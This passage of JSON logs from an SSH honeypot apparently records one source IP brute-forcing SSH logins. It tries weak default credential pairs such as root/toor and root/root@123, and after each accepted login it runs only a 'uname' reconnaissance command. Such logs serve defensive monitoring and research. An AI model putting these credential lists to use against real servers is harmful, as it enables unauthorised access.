nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:45.540567Z","src_ip":"212.227.125.160","session":"5a78d699f4af"}
{"eventid":"cowrie.login.failed","username":"dogeman","password":"dogeman","message":"login attempt [dogeman/dogeman] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:45.697111Z","src_ip":"212.227.125.160","session":"5a78d699f4af"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:46.767391Z","src_ip":"212.227.125.160","session":"5a78d699f4af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56198,"dst_ip":"1.2.3.4","dst_port":22,"session":"432d1bc84fdc","protocol":"ssh","message":"New connection: 212.227.125.160:56198 (1.2.3.4:22) [session: 432d1bc84fdc]","sensor":"my-vps","timestamp":"2025-08-26T21:58:50.722980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:50.724534Z","src_ip":"212.227.125.160","session":"432d1bc84fdc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:50.769894Z","src_ip":"212.227.125.160","session":"432d1bc84fdc"}
{"eventid":"cowrie.login.failed","username":"hiddify-panel","password":"hiddify-panel","message":"login attempt [hiddify-panel/hiddify-panel] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:51.461051Z","src_ip":"212.227.125.160","session":"432d1bc84fdc"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:52.530726Z","src_ip":"212.227.125.160","session":"432d1bc84fdc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51584,"dst_ip":"1.2.3.4","dst_port":22,"session":"fba2fca62c5a","protocol":"ssh","message":"New connection: 212.227.125.160:51584 (1.2.3.4:22) [session: fba2fca62c5a]","sensor":"my-vps","timestamp":"2025-08-26T21:58:56.204187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:56.239991Z","src_ip":"212.227.125.160","session":"fba2fca62c5a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:56.325787Z","src_ip":"212.227.125.160","session":"fba2fca62c5a"}
{"eventid":"cowrie.login.failed","username":"klepetko","password":"klepetko","message":"login attempt [klepetko/klepetko] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:56.572175Z","src_ip":"212.227.125.160","session":"fba2fca62c5a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:57.647651Z","src_ip":"212.227.125.160","session":"fba2fca62c5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46974,"dst_ip":"1.2.3.4","dst_port":22,"session":"46fc1d3258b2","protocol":"ssh","message":"New connection: 212.227.125.160:46974 (1.2.3.4:22) [session: 46fc1d3258b2]","sensor":"my-vps","timestamp":"2025-08-26T21:59:02.175704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:02.179030Z","src_ip":"212.227.125.160","session":"46fc1d3258b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:02.228322Z","src_ip":"212.227.125.160","session":"46fc1d3258b2"}
{"eventid":"cowrie.login.failed","username":"technician","password":"technician","message":"login attempt [technician/technician] failed","sensor":"my-vps","timestamp":"2025-08-26T21:59:02.726589Z","src_ip":"212.227.125.160","session":"46fc1d3258b2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:03.864361Z","src_ip":"212.227.125.160","session":"46fc1d3258b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42360,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbc38b75aae3","protocol":"ssh","message":"New connection: 212.227.125.160:42360 (1.2.3.4:22) [session: dbc38b75aae3]","sensor":"my-vps","timestamp":"2025-08-26T21:59:07.938048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:07.940346Z","src_ip":"212.227.125.160","session":"dbc38b75aae3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:07.996352Z","src_ip":"212.227.125.160","session":"dbc38b75aae3"}
{"eventid":"cowrie.login.failed","username":"packer","password":"packer","message":"login attempt [packer/packer] failed","sensor":"my-vps","timestamp":"2025-08-26T21:59:08.447671Z","src_ip":"212.227.125.160","session":"dbc38b75aae3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:09.499712Z","src_ip":"212.227.125.160","session":"dbc38b75aae3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37746,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae97954479d8","protocol":"ssh","message":"New connection: 212.227.125.160:37746 (1.2.3.4:22) [session: ae97954479d8]","sensor":"my-vps","timestamp":"2025-08-26T21:59:13.358498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:13.360081Z","src_ip":"212.227.125.160","session":"ae97954479d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:13.414009Z","src_ip":"212.227.125.160","session":"ae97954479d8"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:59:14.550635Z","src_ip":"212.227.125.160","session":"ae97954479d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:59:14.987998Z","src_ip":"212.227.125.160","session":"ae97954479d8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:59:14.988909Z","src_ip":"212.227.125.160","session":"ae97954479d8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:15.159474Z","src_ip":"212.227.125.160","session":"ae97954479d8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:15.160983Z","src_ip":"212.227.125.160","session":"ae97954479d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33132,"dst_ip":"1.2.3.4","dst_port":22,"session":"e58027e35356","protocol":"ssh","message":"New connection: 212.227.125.160:33132 (1.2.3.4:22) [session: e58027e35356]","sensor":"my-vps","timestamp":"2025-08-26T21:59:19.627139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:19.629163Z","src_ip":"212.227.125.160","session":"e58027e35356"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:19.674435Z","src_ip":"212.227.125.160","session":"e58027e35356"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:59:19.862706Z","src_ip":"212.227.125.160","session":"e58027e35356"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:59:20.138453Z","src_ip":"212.227.125.160","session":"e58027e35356"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:59:20.139366Z","src_ip":"212.227.125.160","session":"e58027e35356"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:20.395762Z","src_ip":"212.227.125.160","session":"e58027e35356"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:20.397011Z","src_ip":"212.227.125.160","session":"e58027e35356"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56758,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a7f50424f24","protocol":"ssh","message":"New connection: 212.227.125.160:56758 (1.2.3.4:22) [session: 6a7f50424f24]","sensor":"my-vps","timestamp":"2025-08-26T21:59:25.242154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:25.243037Z","src_ip":"212.227.125.160","session":"6a7f50424f24"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:25.292175Z","src_ip":"212.227.125.160","session":"6a7f50424f24"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:59:25.444508Z","src_ip":"212.227.125.160","session":"6a7f50424f24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:59:25.565102Z","src_ip":"212.227.125.160","session":"6a7f50424f24"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:59:25.565780Z","src_ip":"212.227.125.160","session":"6a7f50424f24"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:25.625836Z","src_ip":"212.227.125.160","session":"6a7f50424f24"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:25.627916Z","src_ip":"212.227.125.160","session":"6a7f50424f24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52142,"dst_ip":"1.2.3.4","dst_port":22,"session":"a209db312b5e","protocol":"ssh","message":"New connection: 212.227.125.160:52142 (1.2.3.4:22) [session: a209db312b5e]","sensor":"my-vps","timestamp":"2025-08-26T21:59:30.837741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:30.847901Z","src_ip":"212.227.125.160","session":"a209db312b5e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:59:30.897236Z","src_ip":"212.227.125.160","session":"a209db312b5e"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:59:31.101445Z","src_ip":"212.227.125.160","session":"a209db312b5e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:59:32.273830Z","src_ip":"212.227.125.160","session":"a209db312b5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47534,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc2142c9aaae","protocol":"ssh","message":"New connection: 212.227.125.160:47534 (1.2.3.4:22) [session: cc2142c9aaae]","sensor":"my-vps","timestamp":"2025-08-26T21:59:36.249160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:59:36.270217Z","src_ip":"212.227.125.160","session":"cc2142c9aaae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh